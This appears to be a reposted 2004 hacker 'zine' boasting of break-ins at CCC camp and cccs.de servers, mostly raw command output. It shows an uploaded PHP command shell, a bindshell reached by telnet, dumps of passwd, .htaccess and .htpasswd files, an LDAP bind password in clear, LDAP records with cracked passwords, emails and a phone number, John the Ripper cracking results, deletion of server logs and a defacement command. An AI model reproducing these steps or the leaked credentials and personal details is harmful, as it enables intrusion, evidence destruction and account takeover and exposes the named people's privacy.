Teewurst --> Bohrwurst ccc

[*Sheep]

Link bei heise gefunden.

.~r~----------------------------------------------------------~r~.
; ** A br13f encount4h w1th th3 CCC - meoow ;
`----------------------------------------------------------------'

En realidad no tenemos nada en contra del CCC, de hecho originalmente era admirado y respetado por nosotros, ahora el camp nos sigue pareciendo entretenido, pero ...
hasta los mas grandes pueden caer. No vamos a tratar de romper sus maquinas o rootearlos, tan solo un review de un par de servers.


a) blackhole.camp.ccc.de

AfteR SoMe MaGic HacKinG, We UpLoaD The Cmd sheLL ->

http://wiki.ccc.de/data/rlf.php?cmd=uname -a ; id

FreeBSD blackhole.camp.ccc.de 5.2-CURRENT 5.2-CURRENT #0: Sun Mar 21 22:46:08 CET 2004 root@blackhole.camp.ccc.de /usr/src/sys/i386/compile/BLACKHOLE i386

uid=80(www) gid=80(www) groups=80(www), 101(twiki)

cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.34 2003/04/27 05:45:29 imp Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
twiki:*:101:101:TWiki Admin Account:/usr/local/www/wiki:/usr/local/bin/zsh
Gtinydns:*:102:102:tinydns user:/nonexistent:/sbin/nologin
Gdnslog:*:103:103:dnslog user:/nonexistent:/sbin/nologin
Gaxfrdns:*:104:104:axfrdns user:/nonexistent:/sbin/nologin
Gdnscache:*:105:105:dnscache user:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
cc:*:1001:1001:Christian Carstensen:/home/cc:/usr/local/bin/bash
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/sbin/nologin
daniel:*:1002:1002aniel Mack:/home/daniel:/usr/local/bin/bash
tim:*:1003:1003:Tim Pritlove:/home/tim:/bin/tcsh
radar:*:1004:1004:Marc Teichgraeber:/home/radar:/usr/local/bin/bash
nfast:*:1005:1005:NFast crypto management:/opt/nfast:/bin/sh
gunjin:*:1006:1006ominik Kuehne:/home/gunjin:/bin/tcsh
ulf:*:1007:1007:Ulf Schoeneberg:/home/ulf:/bin/tcsh
ths:*:1008:1008:Thorsten Schroeder:/home/ths:/usr/local/bin/bash
cryx:*:1009:1009:Philipp Wuensche:/home/cryx:/usr/local/bin/bash


cat /etc/hosts
# $FreeBSD: src/etc/hosts,v 1.16 2003/01/28 21:29:23 dbaker Exp $
#
#
# This file should contain the addresses and aliases for local hosts that
# share this file. Replace 'my.domain' below with the domainname of your
# machine.
#
# In the presence of the domain name service or NIS, this file may
# not be consulted at all; see /etc/nsswitch.conf for the resolution order.
#
#
::1 localhost localhost.my.domain
127.0.0.1 localhost localhost.my.domain
#
# Imaginary network.
#10.0.0.2 myname.my.domain myname
#10.0.0.3 myfriend.my.domain myfriend
#
# According to RFC 1918, you can use the following IP networks for
# private nets which will never be connected to the Internet:
#
# 10.0.0.0 - 10.255.255.255
# 172.16.0.0 - 172.31.255.255
# 192.168.0.0 - 192.168.255.255
#
# In case you want to be able to connect to the Internet, you need
# real official assigned numbers. Do not try to invent your own network
# numbers but instead get one from your network provider (if any) or
# from your regional registry (ARIN, APNIC, LACNIC, RIPE NCC, or AfriNIC.
#
# 81.161.129.2 blackhole.camp.ccc.de
# 81.161.129.3 wiki.camp.ccc.de
# 81.161.129.4 register.camp.ccc.de
# 81.161.129.5 jabber.camp.ccc.de
# 81.161.129.254 dnscache.camp.ccc.de

ls -l /usr/local/www/
total 52
drwxr-xr-x 16 root wheel 512 Mar 10 2004 ..
drwxr-xr-x 4 root wheel 512 Jun 14 2003 .dist
drwxr-xr-x 2 root wheel 512 Oct 29 2003 blackhole
drwxr-xr-x 2 root wheel 512 Jun 14 2003 cgi-bin
drwxr-xr-x 2 root wheel 1024 Oct 24 2003 data
drwxr-xr-x 3 root wheel 3584 Jun 13 2003 icons
drwxr-xr-x 2 www www 512 Jun 13 2003 proxy
drwxr-xr-x 3 daniel wheel 512 Aug 6 2003 registration
drwxrwxrwx 6 gunjin gunjin 512 Aug 6 2003 weblog
drwxr-xr-x 3 root wheel 512 Oct 24 2003 wiki.camp.ccc.de
drwxr-xr-x 8 twiki www 512 Nov 12 2003 wiki.ccc.de


ls -l /usr/local/www/wiki.ccc.de/data/
total 379488
drwxrwxr-x 2 www twiki 2048 Sep 5 16:50 CCC
drwxrwsr-t 2 www twiki 50176 Jun 22 11:58 Camp2003
drwxrwsr-x 2 www twiki 6656 Dec 10 2003 Congress2002
drwxrwsr-x 2 www twiki 7680 Jul 12 23:26 Congress2003
drwxrwxr-x 2 www twiki 1024 Sep 9 18:13 Congress2004
drwxrwxr-x 2 www twiki 1024 Sep 28 2003 _Diary
drwxrwsr-t 2 www twiki 1024 Jan 30 2003 _default
-rw-rw-r-- 1 www twiki 3465950 Sep 29 22:53 debug.txt
-rw-rw-r-- 1 www twiki 6551049 Apr 30 2003 log200304.txt
-rw-rw-r-- 1 www twiki 14731515 Jun 1 2003 log200305.txt
-rw-r--r-- 1 www twiki 11708096 Jun 30 2003 log200306.txt
-rw-r--r-- 1 www twiki 26632814 Jul 31 2003 log200307.txt
-rw-rw-r-- 1 www twiki 28008494 Aug 31 2003 log200308.txt
-rw-rw-r-- 1 www twiki 13719573 Sep 30 2003 log200309.txt
-rw-rw-r-- 1 www twiki 12927643 Oct 31 2003 log200310.txt
-rw-rw-r-- 1 www twiki 6943183 Nov 30 2003 log200311.txt
-rw-rw-r-- 1 www twiki 11970965 Dec 31 2003 log200312.txt
-rw-rw-r-- 1 www twiki 6718960 Jan 31 2004 log200401.txt
-rw-rw-r-- 1 www twiki 2327401 Feb 29 2004 log200402.txt
-rw-rw-r-- 1 www twiki 1695438 Mar 31 23:59 log200403.txt
-rw-rw-r-- 1 www twiki 2848784 Apr 30 23:57 log200404.txt
-rw-rw-r-- 1 www twiki 3147505 May 31 23:56 log200405.txt
-rw-rw-r-- 1 www twiki 3844675 Jun 30 23:59 log200406.txt
-rw-rw-r-- 1 www twiki 14003218 Jul 31 23:56 log200407.txt
-rw-rw-r-- 1 www twiki 10900913 Aug 31 23:59 log200408.txt
-rw-rw-r-- 1 www twiki 11105658 Sep 29 22:53 log200409.txt
-rw-rw-r-- 1 www twiki 3419 Aug 13 2001 mime.types
-rw-rw-r-- 1 www twiki 311604 Sep 7 12:55 warning.txt

rm -rf /usr/local/www/wiki.ccc.de/data/log*
Yeah not so clean

last
radar ttyp0 l4-gmbh.berlin.k Wed Sep 22 17:28 - 11:38 (18:09)
wtmp begins Wed Sep 22 17:28:44 CEST 2004

strings /var/log/lastlog
87^@ttyv3
,Attyp0
port-212-202-201
c1?ttyp4
81.161.151.202
Attyp0
port-212-202-174-
QAttyp0
l4-gmbh.berlin.k
@ttyp1
berry.loomes.de
?ttyp2
du-022-193.acces'
/?ttyp2
81.161.130.223
3?ttyp1
81.161.131.245

cat ../../weblog/cgi-bin/.htaccess

AuthName 'Enter MovableType login name'
AuthType Basic

AuthLDAPEnabled on

AuthLDAPUrl ldap://127.0.0.1:389/ou=accounts,o=ccc,c=de?cn?sub?(objectClass=campLogin)

AuthLDAPBindDN "uid=movabletype,ou=applications,o=ccc,c=de"
AuthLDAPBindPassword "Ja93,cA-p.:b"

require valid-user

cat ../../blackhole/.htpasswd
noc03:c0GMwxMty4PiE

ls -l /root
total 84
-rw-r--r-- 1 root wheel 1659 Sep 21 13:33 ardor-ca.crt
-rw-r--r-- 1 root wheel 5026 Sep 22 17:13 blackhole.crt
-rw-r--r-- 1 root wheel 1679 Sep 22 17:13 blackhole.key
-rw-r--r-- 1 root wheel 20480 Sep 22 17:33 blackhole.tar
-rw-r--r-- 1 root wheel 1960 Sep 23 11:19 blackhole2ardor-openvpn-tls.cnf
-rw-r--r-- 1 root wheel 424 Sep 21 16:40 dh2048.pem
-rwxr-xr-x 1 root wheel 55 Sep 22 17:38 home.up
-r-xr-xr-x 1 root wheel 64 Sep 22 17:43 office.up
-rw-r--r-- 1 root wheel 1876 Sep 22 17:43 openvpn-tls-ardor.cnf
-r-xr-xr-x 1 root wheel 350 Oct 15 2003 rsyncd.sh.sample

cat /root/blackhole2ardor-openvpn-tls.cnf
#
# Sample OpenVPN configuration file for
# home using SSL/TLS mode and RSA certificates/keys.
#
# '#' or ';' may be used to delimit comments.

# Use a dynamic tun device.
# For Linux 2.2 or non-Linux OSes,
# you may want to use an explicit
# unit number such as "tun1".
# OpenVPN also supports virtual
# ethernet "tap" devices.
dev tun
#http-proxy 192.168.2.1 8080
#proto tcp-client
#socks-proxy 192.168.2.1 1080

# Our OpenVPN peer is the office gateway.
#remote ardor.gunjin.org
remote 212.42.230.47

# 10.1.0.2 is our local VPN endpoint (home).
# 10.1.0.1 is our remote VPN endpoint (office).
ifconfig 10.1.0.2 10.1.0.1

# Our up script will establish routes
# once the VPN is alive.
#up ./home.up

# In SSL/TLS key exchange, Office will
# assume server role and Home
# will assume client role.
tls-client

# Certificate Authority file
ca ardor-ca.crt

# Our certificate/public key
cert blackhole.crt

# Our private key
key blackhole.key

# OpenVPN uses UDP port 5000 by default.
# Each OpenVPN tunnel must use
# a different port number.
# lport or rport can be used
# to denote different ports
# for local and remote.
# port 25

# Downgrade UID and GID to
# "nobody" after initialization
# for extra security.
; user nobody
; group nobody

# If you built OpenVPN with
# LZO compression, uncomment
# out the following line.
; comp-lzo

# Send a UDP ping to remote once
# every 15 seconds to keep
# stateful firewall connection
# alive. Uncomment this
# out if you are using a stateful
# firewall.
ping 5


# Uncomment this section for a more reliable detection when a system
# loses its connection. For example, dial-ups or laptops that
# travel to other locations.
; ping 15
; ping-restart 45
; ping-timer-rem
; persist-tun
; persist-key

# Verbosity level.
# 0 -- quiet except for fatal errors.
# 1 -- mostly quiet, but display non-fatal network errors.
# 3 -- medium output, good for normal operation.
# 9 -- verbose, good for troubleshooting
verb 3

cat /home/cc/LDAP_camp/camp-dump.ldif.cat
Too big! Only a resume here, the entire file is in the main dir.

dn: cn=scut,ou=accounts,o=ccc,c=de
userpassword: {crypt}77WRwGZ7vvUyk (cracked -> moocow)
cn: scut
email: scut@team-teso.net
equipcomputer: 0
departuretime: 1008
accommodation: camping
transporttype: car
equipwavelan: 0
village: none
fee: 100
equipnotebook: 1
equipcrt: 0
spaceneeded: 16
arrivaltime: 0708

dn: cn=plasmoid,ou=accounts,o=ccc,c=de
userpassword: {crypt}77V5NyFvtCzW. (cracked -> deepmani)
cn: plasmoid
email: plasmoid@thc.org
homepage: http://www.thc.org
fee: 100

dn: cn=cmn,ou=accounts,o=ccc,c=de
userpassword: {crypt}776QxHQHJnnlk (cracked -> haxrme)
cn: cmn
email: cmn@darklab.org
fee: 100

dn: cn=emerson,ou=accounts,o=ccc,c=de
userpassword: {crypt}77nsflOsZCfKE
cn: emerson
email: emerson@packetstormsecurity.org
realname: Emerson Tan
equipcomputer: 0
departuretime: -1
engeltype: kitchen
telephone: +44 781 456 8265
accommodation: camping
transporttype: spaceship
equipwavelan: 0
village: hackcenter
birthyear: 1975
fee: 100
equipnotebook: 1
city: Bristol
equipcrt: 0
engel: 1
gender: m
country: uk
shuttlebus: 1
wikiname: emerson
shirtsize: L
arrivaltime: -1

dn: cn=joe,ou=accounts,o=ccc,c=de
objectClass: campLogin
cn: joe
email: joe@thc.org
userPassword:: e2NyeXB0fTc3dWZpWXNNaFZld0U= (cracked -> chaoss)
fee: 100
structuralObjectClass: campLogin
entryUUID: 898647e4-4da9-1027-849b-f11aa600d856
creatorsName: cn=manager,ou=accounts,o=ccc,c=de
village: none
accommodation: camping
transportType: spaceship
shirtSize: M

echo "this site is axed certified " > http://wiki.ccc.de/data/index.htm




b) www.cccs.de


/var/tmp/bnd
Daemon is starting...OK, pid = 26469

(root@meoow):~$ telnet www.cccs.de 4000 (still working)

sh-2.04$ uname -a
Linux helena.bawue.de 2.4.20-30.7bawue #1 Wed Feb 18 18:25:30 CET 2004 i686 unknown

bash-2.04$ w
4:44am up 176 days, 17:56, 4 users, load average: 2.51, 3.21, 3.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
iibot pts/9 rai35.informatik Fri 4pm 12:22m 0.11s 0.11s -bash
selinger pts/12 - Sun10am 5days 0.27s 0.27s -csh
frberger pts/36 gate.21torr.com 5:16pm 11:28m 0.05s 0.05s -bash
flori pts/28 - 5May04 112days 0.16s 0.02s vncviewer .comp

sh-2.04$ cat .htpasswd
cat .htpasswd
#TWikiGuest:zK.G.uuPi39Qg
IxS:viEi68WrunsI6
PrinCess:9ECGDkiqrL2Ws
HannoWagnerCs4D/EZ6g.Bk
JoergHoh:VmIEZaYKOcOKU
SenfMan:jP2.QjS.K.6Gc
ValerieHaselbek:/wFo2Ih5cooh2
BastianBlank:M25XgY2t3hnDk
FlorianGeiges:ckAGo1.QdXCn.
MichaelStegk:PPfG0hvTtrDmU
PuDerBaer:GIEy7aj0iKPfs
ThiloSchulz:8eaDX8sNHmRQo
DanielZieglermRXLXIfZuvFY
ColinMarquardt:4yCf7YA2sVTg2
PoelzI:70GhzA3UO/nCE
RuedigerRowold:THYvSmPqWIR/6
PsychO:EVrp/IhA5xwJM
RalphAngenendt:92qOoniWpM0r2
LritasZeAchtyn:5.lMZAcoUuVtw
HolgerKnor:LYqREp7Jfrgjc
FlorianLaws:hS0zKne8f.o1U
NDiM:chD9Ifc5f9daM
IshikawaTanaka:PVb39lZn.pd2A
ChristianOst:l4pnNtfFSihAI
AndreasPross:A/xrUe0f5NxKE
BeckerAndre:rOI8t6CVHGpqc
HarryNeufeld:7oKDpxXOoTi.o
MartinFresow:BZD23hF6BlzY.
FabianStelter:U4fwQCQfVpc82
SebastianScholz:qDvL7WQ2Ml6Ss
HagenDigital:wpQ/0b9XM3XRg
AdiFischer:ymL2h2RjXi8pQ
TheGurke:0hDqIqdtAc/gY
MichaelSautter:zwyIfxucreEso
MaRa:FbPNMZIVawwa2
PatrickGoldmann:fOAlt9LfovlQg
PhoeniX:j0YFVS.iHdBtM
BenjaminSchweizer:SoGSQJ97aB5vw
KilianKrause:sIl5coweKU7W6
TorstenK:0SM/.Ud0FuGAo
JoeMue:/binb3hR8GRJk
TomCat:ZFIu4F4JNGMao
ValentinWorm:TNXKW8TSkbGf2
PyLon:Z2K.ui4An9bjM
SebastianRies:e0bZJhXFLKEaw
MoS:qkbnLuhKT3WW6
DunjaVoos:ghI9d.c7Xq5nY
FabianThiel:I5PIIRrP5394g
NicolasSchmid:LDnarjMh/Tw.U
HannoBoeck:gXtlksfBVBFD2
ThS:dBURPNIR3xofQ
AndreasBihlmaier:fOPKNnVbnzbAU
ConguaLeiht:yyRjwxQ1YkwHk
HansGeorgMueller:nM4el20MjkI.U
HypnoticS:QxdjsBEi31HhU
FräuleinKlein:QPjiL56xdKFr2
PatrickGerken:HqqwjpbaU4PHo
AnitaReimann:mV2dwyfjJcr9c
ZugSchlusTWDzDg9Dk1js
CorinnaReichert:ApcL/u88uvfC2
DanielWimpff:emZjPUI8n85Zc
BerenGar:qmSFa1I3OEYrA
CrashBanditcoat:KvGwSDqt24apo
MichaelVollert:y5l2PUVtGuFHU
StoilE:NlYHoHTaBoneM
SebastianPfitzer:LmD5Jb2BZdZ7.
BlueLoop:65OOTgMeN9dEc
PeterFetzer:AgVcGahW87/t.
ThomasHochstein:KGHzNBkIw9oYk
ShirKhan76:PADeUyulUi8oY
ShawnShelton:xVT73fsKGoZIU
ThomasHuehn:PsN9.r5kSUwd.

(root@meoow):~/john-1.6/run$ ./john -incremental cccs
Loaded 73 passwords with 72 different salts (Standard DES [24/32 4K])
magic (TorstenK)
abc123 (PoelzI)
thh (ThomasHochstein)
foo (ColinMarquardt)
creative (ValentinWorm)
123456 (BlueLoop)
mantiut (ValerieHaselbek)
guest (#TWikiGuest)
tester1 (HannoWagner)
9758 (SenfMan)
enter (BenjaminSchweizer)
deppen (FräuleinKlein)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
rootjh:x:0:0:root:/root/home/rootjh:/bin/bash
rootsd:x:0:0:root:/root/home/rootsd:/bin/bash
rootfb:x:0:0:root:/root/home/rootfb:/bin/bash
rootmd:x:0:0:root:/root/home/rootmd:/bin/bash
roothd:x:0:0:root:/root/home/roothd:/bin/bash
rootat:x:0:0:root:/root/home/rootat:/bin/bash
rootmw:x:0:0:root:/root/home/rootmw:/bin/bash
rootjs:x:0:0:root:/root/home/rootjs:/bin/tcsh
rootdg:x:0:0:root:/root/home/rootdg:/bin/bash
rootun:x:0:0:root:/root/home/rootun:/bin/bash
rootjb:x:0:0:root:/root/home/rootjb:/bin/bash
rootuf:x:0:0:root:/root/home/rootuf:/bin/bash
rootfh:x:0:0:root:/root/home/rootfh:/bin/bash
rootig:x:0:0:root:/root/home/rootig:/bin/bash
rootuh:x:0:0:root:/root/home/rootuh:/bin/bash
rootmg:x:0:0:root:/root/home/rootmg:/bin/bash
rootth:x:0:0:root:/root/home/rootth:/bin/bash
rootmh:x:0:0:root:/root/home/rootmh:/bin/bash
rootkk:x:0:0:root:/root/home/rootkk:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0perator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98ident user:/:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
named:x:25:25:Named:/var/named:/bin/false
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
squid:x:23:23::/var/spool/squid:/dev/null
postfix:x:102:235ostfix:/var/spool/postfix:/bin/false
andreas:x:500:500:Andreas Thienemann:/home/andreas:/bin/bash
selinger:x:101:1000:Joachim Selinger:/home/selinger:/bin/tcsh
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
dev:x:501:1000:Frank Scholz:/home/dev:/bin/bash
shendi:x:502:1000:Alexander Shendi:/home/shendi:/bin/bash
flo:x:503:1000:Florian Wohlgemuth:/home/flo:/bin/bash
ps:x:504:1000:Peter Schultheiss:/home/ps:/bin/bash
migieger:x:505:1000:Michael Giegerich:/home/migieger:/bin/tcsh
arny:x:506:1000:Arnold Schulz:/home/arny:/bin/bash
pwalter:x:507:1000:Peter Walter:/home/pwalter:/bin/bash
gerrit:x:508:1000:Gerrit Heitsch:/home/gerrit:/bin/bash
jkret:x:509:1000:Jens Kretzschmar:/home/jkret:/bin/bash
schenk:x:510:1000:André Schenk:/home/schenk:/bin/tcsh
mergl:x:511:1000:Edmund Mergl:/home/mergl:/bin/bash
maaas:x:512:1000:Marcus Gneiting:/home/maaas:/bin/bash
mkuba:x:513:1000:Marcus Kuba:/home/mkuba:/bin/bash
jo:x:514:1000:Jörg Sommrey:/home/jo:/bin/bash
hubersn:x:515:1000:Steffen Huber:/home/hubersn:/bin/bash
georg:x:516:1000:Georg Mühleck:/home/georg:/bin/bash
hanacek:x:517:1000:Andreas Hanacek:/home/hanacek:/bin/bash
haen:x:518:1000:Herbert Neugebauer:/home/haen:/bin/bash
wurst:x:520:1000:Volker Wurst:/home/wurst:/bin/bash
mma:x:522:1000:Michael Mattes:/home/mma:/bin/bash
wolle:x:523:1000:Wolfgang Schweiger:/home/wolle:/bin/bash
hannes:x:524:1000:Johannes Delfmann:/home/hannes:/bin/bash
gfrank:x:525:1000:Günther Frank:/home/gfrank:/bin/bash
markchef:x:526:1000:Andreas Marktscheffel:/home/markchef:/bin/bash
jb:x:527:1000:Joachim Baßmann:/home/jb:/bin/bash
ohaerter:x:528:1000:Otto Härter:/home/ohaerter:/bin/bash
tobi:x:529:1000:Tobias Hennerich:/home/tobi:/bin/bash
joerg:x:530:1000:Jörg Henne:/home/joerg:/bin/bash
stefanr:x:532:1000:Stefan Reitmeier:/home/stefanr:/bin/bash
kauer:x:533:1000ietmar Kauer:/home/kauer:/bin/bash
ekappel:x:534:1000:Eduard Kappel:/home/ekappel:/bin/bash
frank:x:535:1000:Frank Grimm:/home/frank:/bin/bash
juergen:x:536:1000:Jürgen Grieb:/home/juergen:/bin/bash
wmwerner:x:537:1000:Wolfgang M. Werner:/home/wmwerner:/bin/bash
siebert:x:539:1000:Achim Siebert:/home/siebert:/bin/bash
swalter:x:540:1000:Walter, Stefan:/home/swalter:/bin/bash
stefan:x:541:1000:Stefan Eckert:/home/stefan:/bin/bash
alois:x:543:1000:Alois Kessler:/home/alois:/bin/bash
robert:x:544:1000:Henry Herkner:/home/robert:/bin/bash
olmur:x:546:1000:Michael Deindl:/home/olmur:/bin/bash
awalter:x:547:1000:Andreas Walter:/home/awalter:/bin/bash
march:x:548:1000:Marcello Chieffo:/home/march:/bin/bash
mblank:x:549:1000:Michael Blank:/home/mblank:/bin/bash
herby:x:553:1000:Herbert Dampel:/home/herby:/bin/bash
rwaack:x:554:1000:Rüdiger Waack:/home/rwaack:/bin/bash
wiedmann:x:555:1000:Bernd Wiedmann:/home/wiedmann:/bin/bash
joesse:x:556:1000:Stephan Gösling:/home/joesse:/bin/bash
matthead:x:557:1000:Matthias Flatt:/home/matthead:/bin/bash
olly:x:558:1000:Oliver Rehn:/home/olly:/bin/bash
ungerer:x:562:1000:Hermann Ungerer:/home/ungerer:/bin/bash
dh:x:563:1000ieter Hoffmann:/home/dh:/bin/bash
haeuser:x:564:1000:Philipp Häuser:/home/haeuser:/bin/bash
steve:x:565:1000:Stephen Bryant:/home/steve:/bin/bash
maylein:x:566:1000ieter Maylein:/home/maylein:/bin/bash
sstein:x:567:1000:Siegfried Stein:/home/sstein:/bin/bash
ralle:x:568:1000:Rolf Alle:/home/ralle:/bin/bash
pohl:x:569:1000:Mario Pohl:/home/pohl:/bin/bash
oamelche:x:570:1000:Oliver Arno Melchert:/home/oamelche:/bin/bash
wastl:x:571:1000:Sebastian Linkwitz:/home/wastl:/bin/bash
andi:x:573:1000:Kögel, Andreas:/home/andi:/bin/bash
prefect:x:574:1000:Holger Seidel:/home/prefect:/bin/bash
orpheus:x:575:1000:Stefan Hassenstein:/home/orpheus:/bin/bash
ender:x:576:1000:Andreas Zimmer:/home/ender:/bin/bash
berndm:x:578:1000:Bernd Mästling:/home/berndm:/bin/bash
tgild:x:579:1000:Gildhoff, Thorsten:/home/tgild:/bin/bash
thierer:x:580:1000:Martin Thierer:/home/thierer:/bin/bash
hbecker:x:581:1000:Harald Becker:/home/hbecker:/bin/bash
kzell:x:582:1000:Zell, Klaus:/home/kzell:/bin/bash
himpel:x:584:1000:Jens Gelhar:/home/himpel:/bin/bash
mac2:x:585:1000:Marcus Siegl:/home/mac2:/bin/bash
stefank:x:587:1000:Stefan Karl:/home/stefank:/bin/bash
hmrupp:x:589:1000:Hans-Michael Rupp:/home/hmrupp:/bin/bash
marti:x:590:1000:Martin Keller:/home/marti:/bin/bash
uhorn:x:591:1000:Uwe Hornschuh:/home/uhorn:/bin/bash
trillian:x:593:1000:Regina Siedentopf:/home/trillian:/bin/bash
jogi:x:594:1000:Joachim Schwarz:/home/jogi:/bin/bash
schuerre:x:595:1000:Ulrich Schürrer:/home/schuerre:/bin/bash
marten:x:596:1000:Marten Karl:/home/marten:/bin/bash
woerz:x:597:1000ieter Wörz:/home/woerz:/bin/bash
cube:x:598:1000:Heiko Siewert:/home/cube:/bin/bash
aengels:x:601:1000:Andreas Engels:/home/aengels:/bin/bash
hsk:x:602:1000:Holger Skok:/home/hsk:/bin/bash
ericl:x:603:1000:Eric Lavarde:/home/ericl:/bin/bash
aschmid:x:604:1000:Albert Schmid:/home/aschmid:/bin/bash
nj:x:605:1000:Norbert Jung:/home/nj:/bin/bash
schitti:x:606:1000:Rainer Schittenhelm:/home/schitti:/bin/bash
reinhold:x:607:1000:Steffen Reinhold:/home/reinhold:/bin/bash
jhilt:x:608:1000:Jörg Hiltwein:/home/jhilt:/bin/bash
gebhardt:x:609:1000:Markus Gebhardt:/home/gebhardt:/bin/bash
framstag:x:610:1000:Ulli Horlacher:/home/framstag:/bin/bash
mauss:x:612:1000:Rudi Maier:/home/mauss:/bin/bash
bernd:x:613:1000:Bernd Jürgen Schubert:/home/bernd:/bin/bash
hun:x:615:1000:Hans Ulrich Niedermann:/home/hun:/bin/bash
jjk:x:617:1000:Jens Kilian:/home/jjk:/bin/bash
olikoch:x:618:2000:Oliver Koch:/home/olikoch:/bin/bash
cpfann:x:619:1000:Christian Pfannschmidt:/home/cpfann:/bin/tcsh
ixs:x:622:509:Andreas Thienemann:/home/ixs:/bin/bash
kaba:x:623:1000:Alexander Frech:/home/kaba:/bin/bash
shadow:x:626:1000:Jens Schütze:/home/shadow:/bin/bash
hge:x:627:1000:Harald Eggert:/home/hge:/bin/bash
enslin:x:628:1000:Frank Enslin:/home/enslin:/bin/bash
eggi:x:629:1000:Thomas Egglseder:/home/eggi:/bin/bash
rna:x:630:1000:Frank Pelzer:/home/rna:/bin/bash
inge:x:631:1000:Inge Rötlich:/home/inge:/bin/bash
klausv:x:633:1000:Klaus Villinger:/home/klausv:/bin/bash
markusf:x:635:1000:Markus Fuchs:/home/markusf:/bin/bash
martinr:x:636:1000:Martin Rimmele:/home/martinr:/bin/bash
lemchen:x:638:1000:Arvids Lemchens:/home/lemchen:/bin/bash
gorizzz:x:641:1000:Radulovic, Goran:/home/gorizzz:/bin/bash
svenh:x:642:1000:Hornburger, Sven:/home/svenh:/bin/bash
up:x:643:1000:Uwe Pfitzenmeier:/home/up:/bin/bash
moi:x:644:1000:Oliver Herrmann:/home/moi:/bin/bash
chudalla:x:645:1000:Alexander Chudalla:/home/chudalla:/bin/bash
lache:x:646:1000:Stefan Lache:/home/lache:/bin/bash
scirocco:x:647:1000:Harald Schmitz:/home/scirocco:/bin/bash
mappel:x:648:1000:Matthias Appel:/home/mappel:/bin/bash
hjerd:x:650:1000:Hans-Jürgen Erdwiens:/home/hjerd:/bin/bash
schielfk:x:651:1000:Frank Schiele:/home/schielfk:/bin/bash
bol:x:654:1000:Andreas Madsack:/home/bol:/bin/bash
gueschwa:x:655:1000:Günther Schwalb:/home/gueschwa:/bin/bash
simon:x:656:1000:Simon Kaiser:/home/simon:/bin/bash
abr:x:657:1000:Anette Brinck:/home/abr:/bin/bash
boris:x:658:1000:Boris Wörner:/home/boris:/bin/bash
sjens:x:659:1000:Jens Schneider:/home/sjens:/bin/bash
zirz:x:660:1000:Torsten Zirzlaff:/home/zirz:/bin/bash
aauch:x:661:1000:Alexander Auch:/home/aauch:/bin/tcsh
john:x:663:1000:John Hawksley:/home/john:/bin/bash
mariom:x:665:1000:Maak, Mario:/home/mariom:/bin/bash
dirke:x:667:1000irk Eichel:/home/dirke:/bin/bash
sven:x:668:1000:Sven Dittmar:/home/sven:/bin/bash
dominik:x:669:1000:Mark Dominik Bürkle:/home/dominik:/bin/bash
pauln:x:670:1000:Northover, Paul:/home/pauln:/bin/bash
klausm:x:672:1000:Klaus Mohn:/home/klausm:/bin/bash
willam:x:673:1000:Thomas Willam:/home/willam:/bin/bash
hkrause:x:674:1000:Hans Krause:/home/hkrause:/bin/bash
iscs:x:676:1000:Joachim Selinger:/home/iscs:/bin/tcsh
ulla:x:677:1000:Ulla Bansemir:/home/ulla:/bin/bash
crall:x:678:1000:Christoph Rall:/home/crall:/bin/bash
hsmolin:x:680:1000:Holger Smolinski:/home/hsmolin:/bin/bash
walter:x:681:1000:Walter Selg:/home/walter:/bin/bash
markus:x:683:1000:Markus Wochele:/home/markus:/bin/bash
ruendal:x:685:1000:Erik Ründal:/home/ruendal:/bin/bash
katja:x:686:1000:Katja Weitlauff:/home/katja:/bin/bash
franz:x:687:1000:Franz Reinisch:/home/franz:/bin/bash
arno:x:688:1000:Arno Marotz:/home/arno:/bin/bash
michasbk:x:689:1000:Michael Schneider:/home/michasbk:/bin/bash
thiessel:x:691:1000:Marcus Thiessel:/home/thiessel:/bin/bash
mkoch:x:692:1000:Martin Koch:/home/mkoch:/bin/bash
oliverf:x:696:1000:Oliver Fuchs:/home/oliverf:/bin/bash
richardp:x:697:1000:Richard Pleyer:/home/richardp:/bin/bash
skp:x:698:1000:Michael Mössner:/home/skp:/bin/bash
florian:x:699:1000:Florian Schenk:/home/florian:/bin/bash
